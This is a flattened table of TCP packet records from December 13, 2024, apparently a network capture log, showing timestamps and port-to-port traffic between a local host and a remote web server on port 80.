                                                                                                                                                                                                Dec 13, 2024 08:18:57.549312115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549329042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549345970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549371958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549391031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549408913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.549433947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.590039968 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720504999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720626116 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720642090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720658064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720674038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720690966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720705986 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720730066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720741987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720741987 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720748901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720765114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720782042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720804930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720840931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.720995903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721014977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721031904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721048117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721055984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721065998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721102953 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721246958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721303940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721349955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721420050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721571922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721590996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721607924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721615076 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721630096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721721888 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721739054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721755028 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721771955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721780062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721802950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.721978903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722003937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722048998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722455978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722472906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722491026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722520113 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722531080 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722562075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722589016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722605944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722623110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722625971 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.722672939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723157883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723175049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723191023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723222017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723355055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723414898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723429918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723462105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723484039 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723579884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723596096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723613024 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723629951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723637104 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.723679066 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724304914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724323034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724340916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724363089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724572897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724590063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724608898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724623919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724639893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724641085 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724657059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724663973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724675894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724679947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724711895 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724886894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724904060 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724920988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.724968910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725497007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725512981 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725531101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725545883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725559950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725563049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725573063 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725585938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725605011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725646019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725683928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725866079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725883007 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725899935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.725922108 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726387978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726408958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726424932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726439953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726454020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726475954 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726646900 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726665020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726682901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726699114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726706028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726712942 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726716995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726736069 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.726778984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727309942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727339029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727355003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727372885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727375031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727391958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727447033 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727463961 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727479935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727495909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727499962 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727521896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727813005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727830887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.727963924 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728266954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728285074 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728302956 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728324890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728342056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728427887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728444099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728461027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.728482008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741094112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741153955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741169930 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741185904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741200924 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741216898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741230011 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741235018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741271019 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741290092 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741574049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741590977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741606951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741621017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741631985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741668940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741687059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741703987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741720915 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.741746902 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.793127060 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.940798044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.940823078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.940920115 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:57.942807913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.942832947 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:57.942889929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.060905933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.060937881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.061007023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.062467098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.062485933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.062530041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180632114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180660009 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180675983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180691957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180706978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180722952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180741072 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180756092 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180759907 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180771112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180790901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180805922 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180820942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180839062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180854082 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180879116 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.180998087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181014061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181030035 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181045055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181046963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181061983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181077003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181080103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181097031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181108952 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181113958 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181130886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181145906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181147099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181163073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181164980 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181180954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181216002 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181816101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181864977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181960106 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181977987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.181993008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182010889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182027102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182033062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182044983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182060957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182061911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182076931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182091951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182095051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182107925 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182109118 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182126999 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182145119 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182840109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182858944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182874918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182890892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182892084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182908058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182913065 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.182944059 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183254957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183273077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183288097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183305025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183331013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183334112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183350086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183353901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183371067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183387995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183403969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183410883 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183422089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183437109 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183438063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183454990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183461905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.183490038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184159040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184237003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184254885 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184271097 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184279919 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184288025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184304953 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184319973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184319973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184333086 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184339046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184355974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184370995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184386969 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184390068 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184402943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184412003 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.184452057 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185138941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185170889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185187101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185203075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185219049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185235977 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185235977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185255051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185262918 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185272932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185276031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:58.185291052 CET8049726185.81.68.147192.168.2.11
